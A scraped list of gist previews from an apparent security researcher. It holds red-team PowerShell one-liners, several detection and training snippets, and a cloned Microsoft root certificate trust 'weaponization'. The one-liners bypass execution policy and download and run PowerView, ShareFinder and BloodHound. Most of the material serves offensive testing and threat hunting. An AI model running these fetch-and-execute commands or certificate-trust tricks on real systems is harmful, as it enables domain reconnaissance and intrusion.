RedTeam_CheatSheet.ps1
Created November 25, 2019
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on the network, check access under the current user context, and log the results to a file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('');Invoke-BloodHound"
Source.cpp
Created August 20, 2023
#include <windows.h>
#include <iostream>
#include <dbghelp.h>
#include <TlHelp32.h>
#define IOCTL_BASE 0x80012008
constexpr DWORD IREC_IOCTL(DWORD x) { return IOCTL_BASE + x; }
static const char* DeviceName = R"(\\.\IREC)";
blockeddrivers-vt-annotated.xml
Created March 6, 2023
Microsoft recommended driver block rules, but annotated with samples that are present in VirusTotal
<ns0:SiPolicy xmlns:ns0="urn:schemas-microsoft-com:sipolicy">
<ns0:Option>Enabled:Unsigned System Integrity Policy</ns0:Option>
<ns0:Option>Enabled:Advanced Boot Options Menu</ns0:Option>
MHaggis /
Created October 17, 2022 15:58
Table Top With Teeth - Training Exercise


The following script is designed to create artifacts that teams can use to hunt for new or interesting capabilities.

The following table top is based on the code here:

This script is self-contained. It dynamically writes a DLL to disk and loads it into cscript.exe.

To invoke: cscript.exe stranger_things.js. This example expects a 64-bit system.

get_cmdline.reg
Created September 8, 2022
Monitoring Silent Process Exit
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\nltest.exe]
"MonitorProcess"="powershell.exe -Command \"Get-WmiObject win32_process -Filter 'ProcessID = %e' | select CreationDate,ProcessId,CommandLine >> C:\\\\Test\\\\Logcmdline.txt\""
Find-Assemblies.ps1
Created February 14, 2020 04:51 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
HelpMessage="Directory to search for .NET Assemblies in.")]
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
RemoteCertTrust.ps1
Created March 31, 2022 18:05 — forked from mattifestation/RemoteCertTrust.ps1
An example weaponization of trusting a cloned MSFT root CA certificate by installing directly into the registry
$CertThumbprint = '1F3D38F280635F275BE92B87CF83E40E40458400'
sc.js
Created February 2, 2022 13:59
DynamicWrapperX - Register Code Example
//Example Reference:
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';